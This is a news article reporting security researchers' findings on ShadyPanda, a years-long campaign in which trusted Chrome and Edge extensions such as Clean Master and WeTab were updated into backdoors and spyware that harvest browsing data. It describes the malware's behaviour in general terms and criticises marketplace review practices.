A seven-year malicious browser extension campaign infected 4.3 million Google Chrome and Microsoft Edge users with malware, including backdoors and spyware sending people’s data to servers in China. And, according to Koi researchers, five of the extensions with more than 4 million installs are still live in the Edge marketplace.
The attackers, which Koi named ShadyPanda, played the long game: publishing legitimate extensions, accumulating thousands or sometimes millions of downloads over several years, and then pushing a malware-laden update that auto updates across the entire user base.
Because both marketplaces review extensions upon submission – it’s not an ongoing process – these seemingly stellar productivity tools, some with Featured and Verified status alongside glowing user reviews and high install counts, were allowed to track people’s behavior and steal sensitive info silently for years.
“No phishing. No social engineering. Just trusted extensions with quiet version bumps that turned productivity tools into surveillance platforms,” the threat hunting team said in a Monday blog.
Microsoft did not respond to The Register‘s requests for comment. A Google spokesperson confirmed none of the extensions are available on the Chrome Web Store, and we are aware that Google screens every single update to extensions in the Chrome store, no matter how minor the change.
Koi tracked the ShadyPanda’s activity in multiple phases, and says two campaigns are still active.
One of these campaigns included five extensions that infected 300,000 users with a remote-code-execution enabling backdoor. Three of the five were uploaded between 2018 and 2019 and achieved Featured and Verified status. One of those extensions, called Clean Master and published by Starlab Technology, has more than 200,000 installs.
In mid-2024, after being downloaded more than 300,000 times, ShadyPanda pushed a malicious update containing a backdoor across all five running on Chrome and Edge. While the extensions have since been removed from both marketplaces, “the infrastructure for full-scale attacks remains deployed on all infected browsers,” the researchers wrote.
The malware allows complete browser surveillance, checking api.extensionplay[.]com for new instructions every hour, downloading arbitrary JavaScript, and executing it with full browser API access. It can also inject malicious content into any website, including HTTPS connections.
Clean Master then sends all of this stolen data – every URL visited, HTTP referrers showing navigation patterns, timestamps for activity profiling, persistent UUID4 identifiers, and complete browser fingerprints – to ShadyPanda-controlled servers.
Plus, the malware contains anti-analysis capabilities and switches to benign behavior if a researcher opens developer tools.
An additional five extensions from the same publisher launched on Edge around 2023 and now have more than four million combined installs. According to Koi, all five are still live on the Edge marketplace, and two of these install spyware on users’ machines.
One of these five, WeTab, has three million intalls. It’s a surveillance platform disguised as a productivity tool that snarfs all sorts of user data: every URL visited, search queries, mouse-click tracking, browser fingerprinting, page interaction data, and storage access – and then sends all of this, in real time, to 17 different domains (8 Baidu servers in China, 7 WeTab servers in China, and Google Analytics).
“The extension already has dangerous permissions including access to all URLs and cookies, users are downloading them right now,” the researchers wrote. “ShadyPanda can push updates at any time, weaponizing 4 million browsers with the same RCE backdoor framework [from Clean Master] or something even worse.”
Koi also traced ShadyPanda to a couple of earlier, now inactive, campaigns. One of these, which occurred during 2023, included 20 Chrome Web Store extensions and 125 on Microsoft Edge, all disguised as wallpaper or productivity apps.
This one worked by silently tracking and monetizing users’ browsing data. When someone clicked on eBay, Amazon, or Booking.com, the extensions injected affiliate tracking codes and Google Analytics trackers, which were then logged and used to sell people’s website visits and search queries.
A second inactive campaign from early 2023 was also disguised as a new tab productivity tool called Infinity V+. It redirected every user’s search to browser hijacking website trovi.com, exfiltrated cookies, and logged users’ keystrokes in the search box, sending all of this info to external servers.
According to the researchers, all of these ShadyPanda campaigns illustrate a problem in the way marketplaces manage extensions. “They don’t watch what happens after approval,” they wrote. ®
